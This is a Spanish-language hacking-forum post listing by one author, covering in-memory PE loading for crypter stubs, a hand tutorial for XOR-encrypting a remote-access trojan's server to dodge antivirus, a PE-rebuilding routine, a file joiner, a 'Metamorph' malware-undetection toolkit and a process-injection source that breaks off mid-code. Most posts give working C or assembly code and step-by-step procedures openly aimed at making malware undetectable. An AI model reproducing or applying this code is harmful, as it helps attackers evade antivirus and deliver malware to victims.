|
Mostrar Temas
|
Páginas: 1 [2] 3
|
11
|
Seguridad Informática / Análisis y Diseño de Malware / Ejecución de Archivos desde Memoria [Base Relocation]
|
en: 18 Agosto 2009, 19:32 pm
|
Ejecución de Archivos desde Memoria - Base Relocation Bueno, hago éste texto para explicar un poco en que consiste el método y a la vez para que no haya gente que se limite a copiar el código sin más. Todo lo que voy a decir está basado en lo siguiente, el cual será necesario leer antes de éste texto para comprender bien el código. http://www.joachim-bauch.de/tutorials/load_dll_memory.html A la vez, para comprender todo lo que diré, será necesario tener conocimientos sobre el formato PE, y el único texto que encontré que habla un poco de la Base Relocation es el de microsoft: http://download.microsoft.com/download/9/c/5/9c5b2167-8017-4bae-9fde-d599bac8184a/pecoff_v8.docx
El Problema Vale, imaginémonos que estamos programando un crypter. El stub del crypter, al ser ejecutado, descifra el archivo en memoria, y llegamos al momento, en que tenemos el archivo que habíamos cifrado, descifrado y mapeado en memoria, pero no podemos ejecutarlo, puesto no está cargado en su ImageBase, y por lo tanto, todas las instrucciones relativas al ImageBase saltarán a un punto que vete tu a saber que hay. Entre éstas instrucciónes, están las llamadas a las API's (llamadas a punteros de la IAT), y al haberse mapeado y no cargado, la IAT no se cargó con las direcciones de las API's, otro problema . El Loader de Windows Para entender lo que vamos a hacer, vamos a ver antes que es lo que hace windows para ejecutar un archivo cuando nosotros se lo indicamos: - Lee el archivo y busca la cabecera DOS, la cabecera PE y las cabeceras de las secciones.
- Intenta reservar espacio en memoria en la dirección del ImageBase, y si ya está en uso, la reserva en otra dirección. La cantidad de memoria que reserva está marcado por el SizeOfImage.
- Mapea las distintas secciones de acuerdo con su VirtualOffset y VirtualSize y los Flags.
- Si el archivo no está cargado en su ImageBase, hace una reubicación de la base del ejecutable.
- Recorre la Import Table y carga las librerías que importa en ejecutable.
- Rellena la IAT con las direcciones de las funciones que importa.
- Crea el hilo inicial de ejecución y lanza el proceso.
La Solución Si emulamos el Loader de Windows a base de código, podemos arrancar el ejecutable desde memoria sin necesidad de guardarlo en disco y ejecutarlo o tener que crear otro proceso para tener el ImageBase origianal libre. Aquí pongo el código que hice, y subo el proyecto. El archivo lleva en el resource un ejecutable que emite un messagebox. Al arrancar el archivo, la sección de resource se mapea en memoria con todo el ejecutable, y emulando el loader de windows, carga el archivo reubicando la ImageBase y pasandole la ejecución a éste . Comenté mucho el código para que no haya problemas de comprensión, pero es necesario tener muy claro el formato PE . //------------------------------------------------------------------------------------------- // PoC - [Base Relocation] // //Descripción: Ejecuta un archivo mapeado en memoria sin guardarlo en disco //Autor: Hacker_Zero //Fecha: 18-8-2009 //Basado en: http://www.joachim-bauch.de/tutorials/load_dll_memory.html //------------------------------------------------------------------------------------------- #pragma optimize("gsy", on) #pragma comment(linker, "/ENTRY:main") #include <windows.h> #include "resource.h" void main() { //Cargamos ejecutable del resource HRSRC hResource=FindResourceA(NULL,(LPCSTR)MAKEINTRESOURCE(IDR_EXE1),"EXE"); HGLOBAL hGlob=LoadResource(NULL,hResource); DWORD FileSize=SizeofResource(NULL,hResource); LPSTR lpFileMaped=(LPSTR)LockResource(hGlob); PIMAGE_DOS_HEADER IDH; PIMAGE_NT_HEADERS INTH; PIMAGE_SECTION_HEADER ISH; //Obtenemos la cabecera DOS y PE en las estructuras IDH=(PIMAGE_DOS_HEADER)&lpFileMaped[0]; INTH=(PIMAGE_NT_HEADERS)&lpFileMaped[IDH->e_lfanew]; //Creamos el buffer del tamaño del SizeOfImage en el que cargaremos el ejecutable LPSTR ExeBuffer=(LPSTR)VirtualAlloc(NULL,INTH->OptionalHeader.SizeOfImage,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE); //LPSTR ExeBuffer=(LPSTR)GlobalAlloc(GPTR,INTH->OptionalHeader.SizeOfImage); //Copiamos la cabecera DOS y PE al buffer CopyMemory(&ExeBuffer[0],&lpFileMaped[0],INTH->OptionalHeader.SizeOfHeaders); //Copiamos las secciones en su VirtualOffset en el buffer for(DWORD i=0;i<INTH->FileHeader.NumberOfSections;i++) { ISH=(PIMAGE_SECTION_HEADER)&lpFileMaped[IDH->e_lfanew+sizeof(IMAGE_NT_HEADERS)+sizeof(IMAGE_SECTION_HEADER)*i]; CopyMemory(&ExeBuffer[ISH->VirtualAddress],&lpFileMaped[ISH->PointerToRawData],ISH->SizeOfRawData); } //Calculamos el delta entre la dirección del buffer y el ImageBase DWORD Delta=(((DWORD)ExeBuffer)-INTH->OptionalHeader.ImageBase); //------------------------------------------------------------ /* -Reubicamos la dirección base del ejecutable :D- */ //------------------------------------------------------------ //Si no hay tabla de reubicación, salimos if(INTH->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].Size==0) { MessageBoxA(0,"No se ha encontrado Tabla de Reubicaciones\nImposible cargar el archivo",0,0); ExitProcess(0); } //Obteemos el Image Base Relocation PIMAGE_BASE_RELOCATION IBR=(PIMAGE_BASE_RELOCATION)(ExeBuffer+INTH->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress); //Vamos recorriendo todas las etradas del bloque for (;IBR->VirtualAddress>0; ) { //Obtenemos el Bloque de reubicación LPSTR RelocationBlock=(LPSTR)(ExeBuffer+IBR->VirtualAddress); //Obtenemos la primera entrada del bloque LPWORD RelocationEntry=(LPWORD)((LPSTR)IBR+sizeof(IMAGE_BASE_RELOCATION)); //Recorremos todas las entradas del bloque for (DWORD i=0;i<((IBR->SizeOfBlock-sizeof(IMAGE_BASE_RELOCATION))/2);i++,RelocationEntry++) { //Obtenemos los 4 bits que definen el tipo de reubicación DWORD type=*RelocationEntry>>12; //Obtenemos los 12 bits que definen la dirección de la reubicación DWORD offset=*RelocationEntry&0xfff; //Si el tipo de reubicación es relativo a la dirección base, añadimso el delta switch (type) { case IMAGE_REL_BASED_HIGHLOW: //Añadimos a la dirección que depende del imagebase original //el delta entre el imagebase y nuestra dirección base LPDWORD newAddr=(LPDWORD)(RelocationBlock+offset); *newAddr=Delta+(DWORD)*newAddr; break; } } //Vamos al siguiente bloque IBR = (PIMAGE_BASE_RELOCATION)(((DWORD)IBR) + IBR->SizeOfBlock); } //--------------------------------------------------------------------- /* -Cargamos los valores de la IAT para poder llamar a las apis- */ //--------------------------------------------------------------------- PIMAGE_THUNK_DATA ITD; PIMAGE_IMPORT_BY_NAME IIBN; //Comprobamos si hay Import Data Descriptor if (INTH->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].Size>0) { //Si lo hay lo obtenemos en la estructura PIMAGE_IMPORT_DESCRIPTOR IID=(PIMAGE_IMPORT_DESCRIPTOR)(ExeBuffer+INTH->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress); //Vamos recorriendo todas las Dll's importadas por el ejecutable for (;IID->Name;IID++) { //Cargamos la dll HMODULE hLib=LoadLibraryA((LPCSTR)(ExeBuffer+IID->Name)); //Obtenemos la dirección al primer miembro del array Image Thunk Data's ITD=(PIMAGE_THUNK_DATA)((DWORD)ExeBuffer+IID->FirstThunk); //Vamos recorriendo las funciones importadas for (;ITD->u1.Ordinal;ITD++) { //Cargamos el Image Import By Name para obtener el nombre IIBN=(PIMAGE_IMPORT_BY_NAME)(ExeBuffer+ITD->u1.Function); //Obtenemos la dirección de la función y la guardamos en la IAT ITD->u1.Function=(DWORD)GetProcAddress(hLib,(LPCSTR)&IIBN->Name); } } } //Obteemos el EntryPoint de ejecutable que cargamos en el buffer DWORD EntryPoint=((DWORD)ExeBuffer)+INTH->OptionalHeader.AddressOfEntryPoint; //Llamamos al EntryPoint __asm { mov eax,EntryPoint call eax } ExitProcess(0); }
# Cabe destacar que para que el archivo pueda ser ejecutado en un ImageBase distinto al original, es necesario que el archivo tenga tabla de reubicación, el VC++ 2008 la pone en los ejecutables por defecto, y en Fasm se puede añadir con la siguiente línea: section '.reloc' fixups data discardable En VB no se si se pude poner, al menos no lo hace por defecto .
# Los antivirus suelen Hookear las API's de manejo de memoria en un proceso remoto, por eso, la mayoría de crypters que usan API's como WriteProcessMemory o CreateRemoteThread son detectados por las heurísticas. Con éste método se evita tener que llamar a esas API's, por lo que (no lo probé) debería de poder saltarse las heurísticas .
# Pronto actualizaré el post con un código que solucionará el problema de que el archivo deba tener tabla de reubicaciones . Descargar proyecto de ejemplo
Ejecutar archivos sin Relocation Table Bueno, pues terminé el código que ejecuta archivos desde memoria aunque éstos no tengan Relocation Table. Tiene un pequeño fallo, y es que con ejecutables en VB crashea debido a que hay algo raro en el import table, no sé muy bien aún a que se debe pero se puede solucionar. Lo que hace el código es ejecutar un Loader que tiene Relocation Table desde una posición de memoria diferente a su ImageBase. El loader ejecuta el archivo que queremos inyectar desde memoria librerando memoria en el ImageBase original (00400000, desde donde habíamos llamado al loader) y carga ahí el ejecutable, por lo que no es necesario reubicar la ImageBase y funciona . Descargar Código FuenteSaludos
|
|
|
12
|
Seguridad Informática / Análisis y Diseño de Malware / [Taller] Así funcionan los crypters: cifrando malware a mano
|
en: 30 Julio 2009, 19:42 pm
|
Taller: cifrando Malware a Mano
Objetivos de éste taller Debido a la avalancha de crypters que últiamente salen a la luz y que, en mi opinión, el 90% de ellos (principalmente en VB) se hacen utilizando código de terceros sin entender realmente que es lo que programan, decidí hacer éste taller para mostrar el modo de funcionamiento de un crypter, de modo que cualquier persona con interés sea capaz a entenderlo. Al finalizar el talller seremos capaces de entender que es lo que hacen los crypters para burlar a los antivirus, y seremos capaces de hacer éste proceso de forma manual, así como, de tener conocimientos de programación y a partir de éste taller, tendremos los conocimientos necesarios para programar un crypter sabiendo que queremos conseguir realmente.
Herramientas Necesarias
¿Qué vamos a cifrar? Bueno, lo primero que haremos será abrir el server del PI con un el Editor Hexadecimal y el Editor del PE: Vemos que el ejecutable tiene 2 secciones, la .text y la .data. En éste caso vamos a cifrar solamente la sección .text que es la que contiene el código ejecutable. La .data la vamos a dejar tal y como está, porque si nos vamos al editor hexadecimal y nos vamos a 0x1A00 y miramos lo que hay más abajo, vemos que ahí se encuentra la IAT, y cifrar eso nos complicaría bastante las cosas, tal vez para otra entrega, en ésta vamos a dejar esa sección tal y como está : Entonces, lo que vamos a cifrar es lo que va desde 0x200 a 0x1A00 viendolo con el editor hexadecimal. ¿Cómo lo vamos a cifrar? Lo haremos de una forma sencilla. Encriptaremos el archivo en disco y añadiremos un poco de código en un espacio libre, y que haremos que sea el primero en ejecutarse, de modo que cuando el archivo se cargue en memoria, éste código se encargue de descifrar lo que habíamos cifrado de la sección .text y luego salte a donde el programa comenzaba originalmente. Éste código lo vamos a poner al final de la sección ejecutable, debido a que suele haber espacio libre ahí debido al alineamiento de las secciones. Ejecutable original y ejecutable cifrado respectivamente Preparando la sección .text Vamos a buscar el espacio libre al final de la sección ejecutable y lo vamos a rellenar de NOP's usando el Editor Hexadecimal. Luego tambien vamos a cambiar los Flags del apartado Characteristics utilizando el LordPE. Para buscar el espacio libre, nos vamos al LordPE y vemos que la sección .text emipeza en 0x200 (ROffset=0x200) y ocupa 0x1800. 0x200 y 0x1800 son 0x1A00, cojemos el HxD y nos vamos a esa dirección, es justo el comienzo de la sección .data y el final de la .text. Vemos que para arriba tenemos 0x00's, ése va a ser nuestro hueco, seleccionamos los 0's (dejando unos bytes de margen por si las moscas), y lo rellenamos de Nop's (NOP=0x90): Y listo, ya sabemos donde podeomos poner nuestro código desencriptador, a partir de 0x1890 para adelante (anotamos en algún sitio ese valor), ahora otro punto. Para descifrar la sección .text vamos a necesitar que ésta tenga permisos de lectura y escritura (de ejecución ya tiene puesto que es la sección de código), así que abrimos el server con el LordPE, nos vamos a Sections, seleccionamos la sección .text, click derecho->Edti Section Header, damos click en el botón situado en el apartado flags y marcamos la opción "Writeable" ("Readable" ya está), damos "OK" y guardamos todos los cambios. Insertando la rutina encriptadora/desencriptadora Bueno, el siguiente código en ASM desencrypta/cifra un array de bytes usando un Xor: ;--------------------------------------------------------------- ;Taller Encriptacion Malware a Mano: Código Desencriptación ;--------------------------------------------------------------- ;Movemos a eax la dirección de inicio del código cifrado mov eax,402000h ;Movemos a ebx la dirección de fin del código cifrado mov ebx,403000h ;Movemos a ecx la dir del Entry Point Original mov ecx,401038h xor byte ptr ds:[eax],0FFh ;Hacemos el xor al byte con la clave 0FF (se puede cambiar por otro byte) inc eax ;Nos desplazamos al siguiente byte cmp eax,ebx ;Comprobamos si es el último jne 401234h ;Si no lo es, continuamos con el siguiente ret ;Salimos del programa (cambiar ret por nop despues de cifrar) jmp ecx ;Si lo es, saltamos el Entry Point Original
Eso es lo que tenemos que instar en el espacio libre que habíamos encontrado (con unas pequeñas modificaciones). Para eso, vamos al OllyDbg y abrimos el server. Una vez cargado el archivo, damos click derecho, View->Executable File. Ahora nos vamos a la dirección (CTRL+G) dónde hemos empezado a poner los Nop's, 0x1890 (el valor que dije que recordarais). Luego damos click derecho sobre el primer Nop y sellecionamos View Image in Disassembler, así nos situará en donde se cargaron lso Nop's en memoria. Ahí vamos a poner nuestro código, vamos dando doble click en los Nops y vamos introduciendo el código aterior línea a lína hasta que nos quede así: Pero ahí hay que arraglar cosas, las direcciones 0x401000, 0x402000, 0x401038 y 0x4001234 no son correctas para éste ejecutable (y 99.999% seguro que para ningun otro que encontremos ), así que hay que cambiarlas por sus valores correctos. Vamos por la primera, el 402000, ésta es la dirección VIRTUAL donde de donde queremos que empiece a cifrar/descifrar, en nuestro caso, queremos que empiece a cifrar/des en el inicio de la primera sección, que viendo como el editor hexadecimal era 0x200, pero NO, esa es la dirección FÍSICA, al cargarse en memoria esa dirección cambia por algo de la forma 40XXXX (corrientemente). Vale, y como la obtenemos? Pues abrimos el LordPE, cargamos el ejecutable, y le damos para ver las secciones: Ahora ésto es una regla general para todos los casos, para obtener una dirección VIRTUAL a partir de la FÍSICA de una sección hacemos: (DIR FÍSICA-ROFFSET)+VOffset+ImageBase: (0x200-0x200)+0x1000+0x400000= 401000. Ésa es la dirección que tenemos que poner en el primer valor. Vamos con el segundo, el 403000, ése es el valor VIRTUAL donde termina el código que queremos cifrar. En éste caso, el código que queremos cifrar termina donde empezamos a poner los nops, en 0x1890 DIRECCIÓN FÍSICA, así que hacemos (DIR FÍSICA-ROFFSET)+VOffset+ImageBase: (0x1890-0x200)+0x1000+0x400000= 0x402690 (Utilizad la calculadora de windows en modo hex ). Ése es el valor que tenemos que poner en el 2º valor, vamos con el 3º, el 401028, éste es más fácil, ahí hay que poner el AddressOfEntryPoint en memoria del ejecutable, para saberlo abrimos el ejecutable con el LordPE: Cogemos ese valor, se sumamos el ImageBase (0x400000+0x2104) y nos da 402104, ese es nuestro 3º valor, el punto a donde debemos de saltar luego de descifrar los datos. Venga, 4º y último valor que tenemos que cambiar, el 401234, éste también es fácil, la dirección a la que tiene que saltar el bucle si no llegamos al final. Volvemos al olly, donde habíamos introducido la rutina en ASM, y el valor que tenemos que introducir es la dirección donde pusimos el xor byte ptr ds:[eax],0FFh, en éste caso 0x40269F: Y listo, nuestro código encriptador/desencriptador ya funcionaría, tal cual lo copiamos se encargaría de cifrar la sección .text. Debería de quedar así: Así que en el olly damos click derecho "Copy to Executable/All modifications" y guardamos el archivo en disco (click drcho, backuup->save data to file). Ahora tenemos que cambiar el Entry Point por la dirección donde empieza nuestro código en memoria: 2690 (Sin el imagebase): Listo, ahora la rutina encriptadora/desencriptadora será lo primero que se ejecute al iniciar el archivo. cifrando, descifrando Ahora que ya tenemos la rutina encriptadora/desencriptadora en su sitio, vamos a usarla para que nos encripte lo la sección .text, para ésto abrirmos nuevamente el server con el Olly, y ponemos un breakpoint en el ret del código de la rutina desencriptadora. Una vez hecho ésto, pulsamos F9 y el programa empezará a ejecutarse hasta que parará en el ret. En éste momento ya tenemos el código cifrado, pero en memoria, así que vamos a copiarlo al portapapeles. Seleccionamos con el ratón desde 0x401000 hasta 0x401890 (no incluído)(el trozo que ciframos) y hacemos click derecho/bianry/binary copy: Ahora cerramos el olly, y abrimos el archivo nuevamente con el HxD (mientras haces ésto no copies ni pegues nada que te cargas lo que hay en el portapapeles ). Una vez abierto seleccionamos los bytes desde 0x200 hasta 0x1890 (no incluído) y hacemos click derecho/pegar escribiendo y guardamos los cambios. Ahora ya tenemos el código cifrado en disco, entonces ahora lo que tiene que hacer la rutina encriptadora/desencriptadora es descifrar el código y luego saltar al Entry Point Original, para ésto solo tenemos que cambiar el ret del código por un Nop con Olly: Guardamos los cambios en disco y LISTO!! ya tenemso nuestro server cifrado con "nuestro crypter manual ": Despedida Bueno, pues espero que hayáis aprendido algo de mis palabras y del método, sobre todos los que no sabían lo que hacer un crypter, y los que sabían, pues seguro algo aprendieron tambien . Que lo disfrutéis! Y ya sabéis, cualquier duda . Subo también el server modificado después de todo el proceso para que os ayude a encontrar posibles fallos que tengáis . DescargarSaludos PD: Algo que se me olvidó mecionar, utilizando éste método no es necesario inyectar nada en ningún proceso, por lo nos evitamos problemas con heurísticas, y aumentamos 0byes el peso del archivo . Edito: Al final el server no quedó FUD, era que no subí lo que era, y es lo más normal ya que con un simple Xor no se pueden quitar todo así como así . De todas formas eso no importa demasiado, en ésta caso hay espacio de sobra para poner una cifrado mas difícil etc... .
|
|
|
13
|
Seguridad Informática / Análisis y Diseño de Malware / [SRC][C] RebuildPE
|
en: 28 Julio 2009, 20:49 pm
|
Bueno, pues yo aquí otra vez con una función . Ésta función cambia bastantes cosas en el PE, cambia las secciones de orden (en lo que es en el archivo, en la cabecera no ya que de poco serviría), mete el EOF Data dentro de la última sección y actualiza el CheckSum (me aburría ). Tambien tenía casi terminado para que cambiara el Align del archivo, pero se me extendía demasiado el código, si necesito terminarla lo posteo en una función aparte. La parte de reordenar las secciones se puede hacer de una forma más rápida y con menos código (Cambiando sólo el PointerToRawData), pero como eso se me ocurrió despues de terminar.. LPSTR RebuildPE(LPSTR FileName,LPSTR lpFileMaped,DWORD FileSize) { PIMAGE_DOS_HEADER IDH; PIMAGE_NT_HEADERS INTH; PIMAGE_SECTION_HEADER ISH; IDH=(PIMAGE_DOS_HEADER)&lpFileMaped[0]; INTH=(PIMAGE_NT_HEADERS)&lpFileMaped[IDH->e_lfanew]; //Creamos un buffer y guardamos una copia del archivo mapeado LPSTR Temp=(LPSTR)GlobalAlloc(GPTR,FileSize); CopyMemory(&Temp[0],&lpFileMaped[0],FileSize); //Cambiamos las secciones en el archivo de orden (no en la cabecera) for(DWORD i=0;i<INTH->FileHeader.NumberOfSections;i++) { PIMAGE_DOS_HEADER tIDH; PIMAGE_NT_HEADERS tINTH; PIMAGE_SECTION_HEADER tISH; PIMAGE_SECTION_HEADER tISH2; PIMAGE_SECTION_HEADER ISH2; tIDH=(PIMAGE_DOS_HEADER)&Temp[0]; tINTH=(PIMAGE_NT_HEADERS)&Temp[tIDH->e_lfanew]; tISH=(PIMAGE_SECTION_HEADER)&Temp[tIDH->e_lfanew+sizeof(IMAGE_NT_HEADERS)+sizeof(IMAGE_SECTION_HEADER)*(i+1)]; ISH2=(PIMAGE_SECTION_HEADER)&lpFileMaped[IDH->e_lfanew+sizeof(IMAGE_NT_HEADERS)+sizeof(IMAGE_SECTION_HEADER)*(i+1)]; tISH2=(PIMAGE_SECTION_HEADER)&Temp[tIDH->e_lfanew+sizeof(IMAGE_NT_HEADERS)+sizeof(IMAGE_SECTION_HEADER)*i]; ISH=(PIMAGE_SECTION_HEADER)&lpFileMaped[IDH->e_lfanew+sizeof(IMAGE_NT_HEADERS)+sizeof(IMAGE_SECTION_HEADER)*i]; if(i!=INTH->FileHeader.NumberOfSections-1) { CopyMemory(&lpFileMaped[ISH->PointerToRawData],&Temp[tISH->PointerToRawData],tISH->SizeOfRawData); ISH->SizeOfRawData=tISH->SizeOfRawData; ISH->Characteristics=tISH->Characteristics; ISH->VirtualAddress=tISH->VirtualAddress; CopyMemory(&ISH->Name,&tISH->Name,8); ISH2->PointerToRawData=ISH->PointerToRawData+tISH->SizeOfRawData; } else { tISH=(PIMAGE_SECTION_HEADER)&Temp[IDH->e_lfanew+sizeof(IMAGE_NT_HEADERS)]; ISH=(PIMAGE_SECTION_HEADER)&lpFileMaped[IDH->e_lfanew+sizeof(IMAGE_NT_HEADERS)+sizeof(IMAGE_SECTION_HEADER)*i]; CopyMemory(&lpFileMaped[ISH->PointerToRawData],&Temp[tISH->PointerToRawData],tISH->SizeOfRawData); ISH->SizeOfRawData=tISH->SizeOfRawData; ISH->Characteristics=tISH->Characteristics; ISH->VirtualAddress=tISH->VirtualAddress; CopyMemory(&ISH->Name,&tISH->Name,8); } } LPSTR SecTmp=(LPSTR)GlobalAlloc(GPTR,0x28*INTH->FileHeader.NumberOfSections); CopyMemory(&SecTmp[0],&lpFileMaped[IDH->e_lfanew+sizeof(IMAGE_NT_HEADERS)],0x28*INTH->FileHeader.NumberOfSections); //Reordenamos las secciones en la cabecera for(DWORD i=0;i<INTH->FileHeader.NumberOfSections;i++) { if(i==0) { CopyMemory(&lpFileMaped[IDH->e_lfanew+sizeof(IMAGE_NT_HEADERS)],&SecTmp[0x28*(INTH->FileHeader.NumberOfSections-1)],0x28); } else { CopyMemory(&lpFileMaped[IDH->e_lfanew+sizeof(IMAGE_NT_HEADERS)+sizeof(IMAGE_SECTION_HEADER)*i],&SecTmp[0x28*(i-1)],0x28); } } GlobalFree(Temp); //Obtenemos el PointerToRawData más alto y el tamaño total de todas las secciones DWORD MaxPointerToRawData=0; DWORD TotalSectionsSize=0; for(DWORD i=0;i<INTH->FileHeader.NumberOfSections;i++) { ISH=(PIMAGE_SECTION_HEADER)&lpFileMaped[IDH->e_lfanew+sizeof(IMAGE_NT_HEADERS)+sizeof(IMAGE_SECTION_HEADER)*i]; if(MaxPointerToRawData<ISH->PointerToRawData) { MaxPointerToRawData=ISH->PointerToRawData; } TotalSectionsSize=TotalSectionsSize+(DWORD)(ISH->SizeOfRawData); } //Obtenemos la sección con el PointerToRawData más alto for(DWORD i=0;i<INTH->FileHeader.NumberOfSections;i++) { ISH=(PIMAGE_SECTION_HEADER)&lpFileMaped[IDH->e_lfanew+sizeof(IMAGE_NT_HEADERS)+sizeof(IMAGE_SECTION_HEADER)*i]; //Si es la sección que contiene el PointerToRawData más alto salimos del bucle if(ISH->PointerToRawData==MaxPointerToRawData) { i=INTH->FileHeader.NumberOfSections; } } //Si hay EOF Data if(ISH->PointerToRawData+ISH->SizeOfRawData<FileSize) { //Metemos el EOF Data dentro de la última sección ISH->SizeOfRawData=ISH->SizeOfRawData+(FileSize-(ISH->PointerToRawData+ISH->SizeOfRawData)); } //Obtenemos el SizeOfImage y ajustamos el VirtualSize de las secciones DWORD SizeOfImage=0; for(DWORD i=0;i<INTH->FileHeader.NumberOfSections;i++) { ISH=(PIMAGE_SECTION_HEADER)&lpFileMaped[IDH->e_lfanew+sizeof(IMAGE_NT_HEADERS)+sizeof(IMAGE_SECTION_HEADER)*i]; ISH->Misc.VirtualSize=ISH->SizeOfRawData; if(SizeOfImage<ISH->VirtualAddress) { SizeOfImage=ISH->VirtualAddress+ISH->Misc.VirtualSize; } } //Ajustamos el SizeOfImage INTH->OptionalHeader.SizeOfImage=SizeOfImage; //Recalculamos el CheckSum _MapFileAndCheckSum miMapFileAndCheckSum=NULL; HMODULE hLib=LoadLibraryA("IMAGEHLP.DLL"); miMapFileAndCheckSum=(_MapFileAndCheckSum)GetProcAddress(hLib,"MapFileAndCheckSumA"); DWORD OrignalCheckSum=0; DWORD newCheckSum=0; miMapFileAndCheckSum((PTSTR)FileName,&OrignalCheckSum,&newCheckSum); INTH->OptionalHeader.CheckSum=newCheckSum; return lpFileMaped; }
Como las secciones no están ordenadas por el PointerToRawData en la cabecera, algunos visores del PE (Pe explorer por ejemplo) dice que tiene EOF data, pero no la tiene . Saludos PD: Gracias a Karcrack y Arkangel por escuchar mis lamentos .
|
|
|
15
|
Seguridad Informática / Abril negro / Little Joiner 1.0 (Open Source)
|
en: 10 Mayo 2009, 13:05 pm
|
Little Joiner Bueno, pare descansar un poco de programar el Virus Metamorph me puse a programar éste joiner. ¿Qué es?Es un Joiner programado en C capaz de unir infinitos archivos, lo de siempre . CapturaCaracterísticas-Tamaño del stu reducido, 1.7kb. - Comprime los archivos a juntar. Ésto quiere decir que si juntamos un archivo de 20kb con uno de 10kb más el stub de 1.7kb el tamaño del ejecutable final rondará los 10kb (Depende del tipo de archivo) Gracias a Karcrack por hablarme de éstas apis que no conocía -Dos stubs, uno que soporta icono y otro que no -El stub sin icono realinea el pe para dejar el EOF dentro de la sección. -Permite cambiar el icono Cosas que se pueden mejorar-Se puede añadir cifrado, no lo hice porque el comprimir ya se ofusca bastante, pero puede ser algo a añadir. -El stub con icono no permite dejar los archivos dentro de la sección sinó que se quedan en el EOF. Ésto se debe a que no sé con antelación cuanto va a ocupar el archivo ya que dependerá del icono que se le añada, se podría corregir añadiendo una sección para albergar los archivos a juntar. -Seguro tiene algunos fallos debido a que apenas lo testeé y ya estoy cansado de joiner . Descargar AplicaciónDescargar SourceSaludos PD: La función para cambiar el icono no es mía, pertenece a Tughack.
|
|
|
17
|
Seguridad Informática / Abril negro / Proyecto Metamorph
|
en: 24 Abril 2009, 23:31 pm
|
Metamorph Autores: -Arkangel -Karcrack -Hacker_Zero
Bueno lo prometido es deuda, dije que os mantendría informados sobre el desarrollo de éste proyecto y lo haré en éste post. Iré actualizando éste post según vayamos progresando en el desarrollo del proyecto, y así también se le dará la oportunidad a cualquiera de aportar sus ideas. Próxima Versión:La próxima versión será la v2.0. Con ésta versión el proyecto da un vuelco para dejar de ser una herramienta y convertirse en un entorno para la indetectabilización de malware, contanto con numerosas herramientas como un disassembler, editor hexadecimal, editor de recursos, buscador de firmas, etc. Otra importante novedad es que en ésta versión utilizaremos las librerías Qt para el desarrollo de la GUI, lo que nos adelanta bastante trabajo y la la vez da unos resultados muy buenos. Algunas de las nuevas características que tendrá la nueva versión son por ejemplo, que cuenta con un disassembler, lo que le permite al programa modificar el ejecutable a su antojo sin correr el riesgo de modificar opcodes que sin saber a qué pertenecen. Otra característica importante y que esperamos que dé buenos resultados es la opción de hacer un rebuild a la IAT, tanto sobreescribiendo la IAT original, como moviendola a otro sitio como cambiar la IAT por otra que sólo importe LoadLibraryA y GetProcAddress y encripte las otras apis y se encargue de cargarlas en tiempo de ejecución . Desarrollo próxima versión: 20%
Versión 2.0 20% Capturas:Desarrollo-GUI 90%-Dll Debuger 70%-Disassembler 60%-Rebuild IAT 50%-Buscador de Firmas 40%-Editor Resource 10%-Añadir Espacio Sección Ejecutable 100%-Añadir Sección 100%
Versión 1.0 BETA 100% Características:-Visor PE -Buscar espacio libre -Redireccionar Entry Point -Detección de ejecutables VB -Forzar Metamorfosis Offset (Meepa) -Forzar Metamorfosis Offset (Xor) -Redireccionar Calls C/C++ y ASM (Recodeada, con algoritmo pseudoaleatorio, nunca genera exes iguales) -Ofuscación mediante la inserción de saltos -Cambiar el Case de los Imports Versión BETA. El programa seguramente tenga numerosos fallos y el comportamiento puede no ser el esperado.El programa sólo funciona bien con ejecutables compilados en ASM y C/C++. No es recomendable usarlo con ejecutables en VB o en Delphi debido a que creará un ejecutable corrupto con un 99% de certeza.Es necesario que el ejecutable tenga espacio libre al final de la sección ejecutable, en caso contraro el programa no funcionará. En el caso de crear éste espacio a mano, dejar la zona a 0'sEn algunos pc's el programa se cuelga al pulsar analizar. Debido a la imposibilidad de los autores de reproducir éste error, si alguien encuentra la causa sería de gran ayuda.Lo más interesante de ésta versión BETA es el código fuente. Rogamos que cualquier recomendación, bug, cuelgue, ejecutable corrupto o cualquier tipo de problema sea comunicado para poder solucionarlo.Probado con ejecutables compilados en C/C++ y FASM de los cuales en ningún caso provocó la corrupción del ejecutable.El rating de eficacia es bastante alto, usando una combinación de RedirectCalls, Jmp Ofuscation y Change IAT Case quita una media de 10-15 antivurs de 20.Lista de Bugs encontrados hasta el momento:- En algunos PC's el programa se cierra al pulsar analizar. - No funciona con ejecutables de 64 bits. - El programa debería comprobar si existe la carpeta Tools. - La función de ofuscación por jmp's puede romper el ejecutable, hay que depurarla más. Descargar HerramientaDescargar Código Fuente
Iré actualizando el post según vayamos progresando. Saludos .
|
|
|
18
|
Programación / ASM / SRCs de Hacker_Zero
|
en: 18 Abril 2009, 11:51 am
|
Bueno, lo primero no sé si esto debe ir aquí o en análisis y diseño de malware, sino no va a aquí que alguien lo mueva . ;\\\///\\\///\\\///\\\///\\\///\\\///\\\///\\\///\\\///\\\///\\\///\\\///\\\///\\\ ;\\\///\\\///\\\///\\\///\\\Inyección de Código en Memoria //\\\///\\\///\\\///\\\ ;\\\///\\\///\\\///\\\///\\\ By Hacker_Zero //\\\///\\\///\\\///\\\ ;\\\///\\\///\\\///\\\///\\\ http://www.eduhack.es //\\\///\\\///\\\///\\\ ;\\\///\\\///\\\///\\\///\\\///\\\///\\\///\\\///\\\///\\\///\\\///\\\///\\\///\\\ Format PE GUI 4.0 entry start include 'win32a.inc' Proceso db 'explorer.exe',0 nUser32 db 'USER32.DLL',0 nMessageBox db 'MessageBoxA',0 hProceso dd ? DirFuncion dd ? TamañoDatos dd ? pInfo PROCESS_INFORMATION sInfo STARTUPINFO start: ;Cargamos la USER32.DLL invoke LoadLibrary,nUser32 ;Obtenemos la dirección de MessageBoxA invoke GetProcAddress,eax,nMessageBox mov [mMessageBoxA],eax ;Obtenemos la dirección de ExitProcess push [ExitProcess] pop [mExitProcess] ;Creamos el Proceso invoke CreateProcessA,0,Proceso,0,0,0,CREATE_SUSPENDED,0,0,sInfo,pInfo ;Guardamos el Handle push [pInfo.hProcess] pop [hProceso] ;Obtenemos el tamaño e la función a inyectar mov ebx,FIN sub ebx,FuncionInyectada mov [TamañoDatos],ebx ;Reservamos espacio en memoria para la función a 